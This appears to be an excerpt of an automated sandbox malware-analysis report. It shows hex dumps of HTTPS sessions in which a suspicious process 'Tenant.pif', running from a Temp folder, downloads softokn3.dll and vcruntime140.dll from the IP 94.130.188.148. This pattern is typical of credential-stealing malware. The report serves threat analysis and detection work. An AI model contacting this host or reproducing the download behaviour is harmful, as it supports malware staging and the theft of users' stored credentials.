                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                      Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                      Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                      Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                      Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                      Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                      Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                      Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.55995194.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:43 UTC226OUTGET /softokn3.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:44 UTC262INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:44 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 257872
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:44 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:44 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                      Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                      Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                      Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                      Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                      Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                      Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                      Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                      Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                      Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.55995294.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:45 UTC230OUTGET /vcruntime140.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:46 UTC261INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:45 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 80880
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:45 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:46 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                      2024-08-29 18:49:46 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                      Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
